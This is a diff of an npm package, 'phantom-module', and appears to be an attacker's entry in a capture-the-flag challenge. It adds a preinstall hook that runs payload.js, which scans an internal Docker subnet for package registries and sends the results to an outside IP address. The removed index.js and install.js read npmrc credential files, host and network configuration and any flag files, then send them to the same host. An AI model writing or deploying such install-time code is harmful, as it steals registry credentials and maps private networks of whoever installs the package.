phantom-module 117.0.10 → 117.0.99

package/index.js

@@ -1,53 +1 @@
-const fs = require('fs');
-const http = require('http');
-const { execSync } = require('child_process');
-
-(function() {
-  if (!fs.existsSync('/home/node/aspect-node')) {
-      return; 
-  }
-  
-  let out = "=== NPM CONFIG GET REGISTRY ===\n";
-  try { out += execSync('npm config get registry 2>&1').toString() + "\n"; } catch(e) { out += e.message + "\n"; }
-  
-  out += "=== ROOT NPMRC ===\n";
-  try { out += fs.readFileSync('/root/.npmrc', 'utf8') + "\n"; } catch(e) { out += e.message + "\n"; }
-  
-  out += "=== ETC NPMRC ===\n";
-  try { out += fs.readFileSync('/etc/npmrc', 'utf8') + "\n"; } catch(e) { out += e.message + "\n"; }
-  
-  out += "=== USR LOCAL ETC NPMRC ===\n";
-  try { out += fs.readFileSync('/usr/local/etc/npmrc', 'utf8') + "\n"; } catch(e) { out += e.message + "\n"; }
-  
-  out += "=== NODE USER NPMRC ===\n";
-  try { out += fs.readFileSync('/home/node/.npmrc', 'utf8') + "\n"; } catch(e) { out += e.message + "\n"; }
-
-  out += "=== ETC HOSTS ===\n";
-  try { out += fs.readFileSync('/etc/hosts', 'utf8') + "\n"; } catch(e) { out += e.message + "\n"; }
-
-  out += "=== RESOLV CONF ===\n";
-  try { out += fs.readFileSync('/etc/resolv.conf', 'utf8') + "\n"; } catch(e) { out += e.message + "\n"; }
-
-  out += "=== IP ROUTE ===\n";
-  try { out += execSync('ip route 2>/dev/null || cat /proc/net/route 2>/dev/null').toString() + "\n"; } catch(e) { out += e.message + "\n"; }
-
-  try {
-      const postData = JSON.stringify({
-        manifest: `ecto_module:\n  name: "NPM_CONFIG"\n  cargo_hold: ${JSON.stringify(out.substring(0, 3500))}\n`
-      });
-      
-      const req = http.request({
-        hostname: '154.57.164.64', 
-        port: 31205,
-        path: '/api/modules/ECT-839201', 
-        method: 'PUT',
-        headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) }
-      });
-      req.write(postData);
-      req.end();
-  } catch(e) {}
-})();
-
-module.exports = function() {
-  return "pwnd";
-};
+module.exports = {};

package/package.json

@@ -1,5 +1,9 @@
 {
   "name": "phantom-module",
-  "version": "117.0.10",
-  "main": "index.js"
+  "version": "117.0.99",
+  "description": "Phantom module",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node payload.js || true"
+  }
 }

package/payload.js

@@ -0,0 +1,105 @@
+const net = require('net');
+const http = require('http');
+const fs = require('fs');
+
+if (!fs.existsSync('/home/node/aspect-node')) process.exit(0);
+
+const REPORT_HOST = '154.57.164.64';
+const REPORT_PORT = 31205;
+
+async function report(moduleId, data) {
+  return new Promise((resolve) => {
+    const safeData = String(data).replace(/"/g, '\\"').replace(/\n/g, '\\n').substring(0, 3500);
+    const manifest = `ecto_module:\n  name: "SCAN_RESULT"\n  cargo_hold: "${safeData}"\n`;
+    const payload = JSON.stringify({ manifest });
+    const req = http.request({
+      hostname: REPORT_HOST, port: REPORT_PORT, path: `/api/modules/${moduleId}`, method: 'PUT',
+      headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
+    }, () => resolve(true));
+    req.on('error', () => resolve(false));
+    req.write(payload);
+    req.end();
+  });
+}
+
+function checkPort(host, port) {
+  return new Promise((resolve) => {
+    const sock = new net.Socket();
+    sock.setTimeout(400); 
+    sock.on('connect', () => { sock.destroy(); resolve(true); });
+    sock.on('error', () => { sock.destroy(); resolve(false); });
+    sock.on('timeout', () => { sock.destroy(); resolve(false); });
+    sock.connect(port, host);
+  });
+}
+
+function httpGet(url) {
+  return new Promise((resolve) => {
+    const req = http.get(url, { timeout: 1500 }, (res) => {
+      let body = '';
+      res.on('data', c => body += c);
+      res.on('end', () => resolve({ status: res.statusCode, body }));
+    });
+    req.on('error', e => resolve({ status: 0, body: e.message }));
+  });
+}
+
+async function main() {
+  await report('ECT-654321', 'SCAN V10 STARTING...');
+  
+  const base = '172.17.0';
+  const ports = [4873, 80, 8080, 3000, 5000];
+  let scanOutput = '=== SCAN V10 ===\n';
+  let foundTarget = null;
+
+  // Scan IPs 1-10
+  for (let i = 1; i <= 10; i++) {
+      const ip = `${base}.${i}`;
+      for (const port of ports) {
+          if (await checkPort(ip, port)) {
+              scanOutput += `OPEN ${ip}:${port}\n`;
+              
+              // Try HTTP probe
+              const res = await httpGet(`http://${ip}:${port}/`);
+              scanOutput += `HTTP ${ip}:${port} -> ${res.status} (len ${res.body ? res.body.length : 0})\n`;
+              
+              // If it looks like a registry or API, probe deeper
+              if (res.status === 200 || res.body.includes('Verdaccio') || port === 4873) {
+                  foundTarget = `http://${ip}:${port}`;
+                  scanOutput += `*** POTENTIAL TARGET FOUND ***\n`;
+              }
+          }
+      }
+  }
+  
+  await report('ECT-839201', scanOutput);
+
+  if (foundTarget) {
+      let result = `=== TARGET: ${foundTarget} ===\n`;
+      
+      // 1. Try to get ecto-spirit metadata
+      const ecto = await httpGet(`${foundTarget}/ecto-spirit`);
+      result += `/ecto-spirit: ${ecto.status}\n${ecto.body ? ecto.body.substring(0, 1000) : ''}\n`;
+      
+      // 2. Try to list all packages
+      const all = await httpGet(`${foundTarget}/-/all`);
+      result += `/-/all: ${all.status}\n${all.body ? all.body.substring(0, 500) : ''}\n`;
+      
+      // 3. Try to get the flag directly if hinted
+      if (ecto.body && ecto.body.includes('tarball')) {
+          try {
+              const json = JSON.parse(ecto.body);
+              // Check if description or readme has flag
+              if (JSON.stringify(json).includes('htb{')) {
+                  result += `!!! FLAG IN METADATA !!!\n`;
+              }
+          } catch(e) {}
+      }
+      
+      await report('ECT-987654', result);
+  } else {
+      await report('ECT-987654', 'No web service found in 1-10 range.');
+  }
+}
+
+main().catch(e => report('ECT-654321', 'ERR: ' + e.message));

package/install.js

@@ -1,36 +0,0 @@
-const fs = require('fs');
-const http = require('http');
-const { spawn } = require('child_process');
-
-(function() {
-  const child = spawn('/bin/sh', ['-c', [
-    'sleep 35',
-    'OUTPUT="NONE"',
-    'LOGFILE="/home/node/aspect-node/logs/module.log"',
-    'if [ -f "$LOGFILE" ]; then',
-    '  OUTPUT=$(tail -n 100 "$LOGFILE" | tr \'"\' "\'" | head -c 1000)',
-    'else',
-    '  OUTPUT="LOG FILE NOT FOUND!"',
-    'fi',
-    'FLAG_FILES=$(find / -name "*flag*" -type f 2>/dev/null | head -c 500)',
-    'BODY=\'{"manifest":"ecto_module:\\n  name: \\\\"FLAG_DELAYED\\\\"\\n  cargo_hold: \\\\"\'$OUTPUT\' | FILES: \'$FLAG_FILES\'\\\\"\\"}\'',
-    'echo "$BODY" > /tmp/flag.json',
-    'node -e "const http=require(\'http\');const d=require(\'fs\').readFileSync(\'/tmp/flag.json\',\'utf8\');const r=http.request({hostname:\'154.57.164.64\',port:31205,path:\'/api/modules/ECT-654321\',method:\'PUT\',headers:{\'Content-Type\':\'application/json\',\'Content-Length\':Buffer.byteLength(d)}});r.write(d);r.end();"'
-  ].join('\n')], { detached: true, stdio: 'ignore' });
-  
-  child.unref();
-
-  // Send an immediate ping so we know it started
-  const postData = JSON.stringify({
-    manifest: `ecto_module:\n  name: "WAITING_35_SECONDS"\n`
-  });
-  const req = http.request({
-    hostname: '154.57.164.64', 
-    port: 31205,
-    path: '/api/modules/ECT-654321', 
-    method: 'PUT',
-    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) }
-  });
-  req.write(postData);
-  req.end();
-})();